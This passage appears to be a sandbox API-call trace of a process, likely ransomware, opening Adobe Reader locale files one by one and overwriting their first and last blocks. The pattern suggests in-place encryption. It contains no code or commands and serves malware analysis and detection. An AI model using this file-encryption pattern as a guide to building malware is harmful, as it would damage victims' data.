lpOverlapped=0x0) returned 1 [0085.565] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8e00 [0085.565] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.566] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.566] WriteFile (in: hFile=0x1e4, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.566] CloseHandle (hObject=0x1e4) returned 1 [0085.567] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Reflow.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\reflow.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.567] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.568] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1200 [0085.568] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.568] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.568] ReleaseMutex (hMutex=0x168) returned 1 [0085.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.SLV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reflow.SLV", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reflow.SLV", lpUsedDefaultChar=0x0) returned 10 [0085.568] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2fdf2bc*=0x1200, lpOverlapped=0x0) returned 1 [0085.570] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0085.570] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1788, lpOverlapped=0x0) returned 1 [0085.570] CloseHandle (hObject=0x1e4) returned 1 [0085.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Weblink.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\weblink.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.571] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.571] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6e00 [0085.571] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.571] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.572] ReleaseMutex (hMutex=0x168) returned 1 [0085.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.SLV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.SLV", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.SLV", lpUsedDefaultChar=0x0) returned 11 [0085.572] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.577] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0085.577] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.577] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e00 [0085.577] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.578] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.578] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.578] CloseHandle (hObject=0x1e4) returned 1 [0085.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\DVA.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\dva.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.580] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.580] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4800 [0085.580] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.580] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.580] ReleaseMutex (hMutex=0x168) returned 1 [0085.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SVE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0085.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.SVE", cchWideChar=7, lpMultiByteStr=0x1f7aa8c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.SVE", lpUsedDefaultChar=0x0) returned 7 [0085.580] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.582] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3800 [0085.583] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.583] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3800 [0085.583] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.583] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.584] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.584] CloseHandle (hObject=0x1e4) returned 1 [0085.584] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\RdLang32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\rdlang32.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.585] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.585] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x141800 [0085.585] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.585] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.585] ReleaseMutex (hMutex=0x168) returned 1 [0085.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SVE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.SVE", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.SVE", lpUsedDefaultChar=0x0) returned 12 [0085.585] ReadFile (in: hFile=0x1e4, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0085.588] ReadFile (in: hFile=0x1e4, lpBuffer=0x28a3918, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.590] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x140800 [0085.590] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.593] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x140800 [0085.594] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.594] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.594] WriteFile (in: hFile=0x1e4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0085.594] WriteFile (in: hFile=0x1e4, lpBuffer=0x28a3918*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.594] CloseHandle (hObject=0x1e4) returned 1 [0085.595] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Spelling.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\spelling.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.596] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.596] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2800 [0085.596] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.596] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.596] ReleaseMutex (hMutex=0x168) returned 1 [0085.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SVE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.SVE", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.SVE", lpUsedDefaultChar=0x0) returned 12 [0085.596] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.598] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1800 [0085.599] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.599] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1800 [0085.599] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.599] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.599] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.600] CloseHandle (hObject=0x1e4) returned 1 [0085.600] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Checkers.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\checkers.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.601] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.601] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1d600 [0085.601] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.601] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.601] ReleaseMutex (hMutex=0x168) returned 1 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.TUR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.TUR", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.TUR", lpUsedDefaultChar=0x0) returned 12 [0085.601] ReadFile (in: hFile=0x1e4, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0085.604] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c600 [0085.604] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.605] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c600 [0085.606] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.606] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.606] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.606] CloseHandle (hObject=0x1e4) returned 1 [0085.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\PDDom.TUR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\pddom.tur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.607] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.607] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2a00 [0085.608] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.608] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.608] ReleaseMutex (hMutex=0x168) returned 1 [0085.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.TUR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDDom.TUR", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDDom.TUR", lpUsedDefaultChar=0x0) returned 9 [0085.608] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.610] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0085.611] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.611] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1a00 [0085.611] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.612] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.612] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.612] CloseHandle (hObject=0x1e4) returned 1 [0085.612] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.613] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.613] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x9270 [0085.613] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.613] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.613] ReleaseMutex (hMutex=0x168) returned 1 [0085.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7342c, 